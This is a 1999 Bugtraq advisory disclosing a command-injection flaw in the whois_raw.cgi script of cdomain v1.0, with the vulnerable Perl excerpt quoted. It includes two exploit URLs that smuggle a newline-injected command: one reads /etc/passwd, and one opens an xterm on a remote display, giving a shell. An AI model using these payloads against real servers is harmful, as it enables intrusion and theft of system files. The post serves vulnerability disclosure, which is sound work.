[10690] in bugtraq
whois_raw.cgi problem
daemon@ATHENA.MIT.EDU (Salvatore Sanfilippo -antirez-)
Tue Jun 1 15:38:03 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <19990601003451.A2973@mclink.it>
Date: Tue, 1 Jun 1999 00:34:51 +0200
Reply-To: Salvatore Sanfilippo -antirez- <md5330@MCLINK.IT>
From: Salvatore Sanfilippo -antirez- <md5330@MCLINK.IT>
To: BUGTRAQ@NETSPACE.ORG
Hi,
sorry if this has already been known.
There is a problem in whois_raw.cgi, called from
whois.cgi. whois_raw.cgi is part of cdomain v1.0.
I don't know if new versions are vulnerable.
#!/usr/bin/perl
#
# whois_raw.cgi Written by J. Allen Hatch (zone@berkshire.net)
# 04/17/97
#
# This script is part of the cdomain v1.0 package which is available at:
# http://www.your-site.com/~zone/whois.html
...
require ("/usr/lib/perl5/cgi-lib.pl");
...
$fqdn = $in{'fqdn'};
# Fetch the root name and concatenate
# Fire off whois
if ($in{'root'} eq "it") {
@result=`$whois_cmd_it $fqdn`;
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
@result="Dettagli non disponibili per il dominio richiesto.";
} else {
@result=`$whois_cmd $fqdn`;
}
...
The exploit is banal and well known problem:
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
bye,
antirez
--
Salvatore Sanfilippo antirez | md5330@mclink.it | antirez@alicom.com
try hping: http://www.kyuzz.org/antirez antirez@seclab.com
'se la barca non ce l'hai dove uzba te ne vai?
se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci)
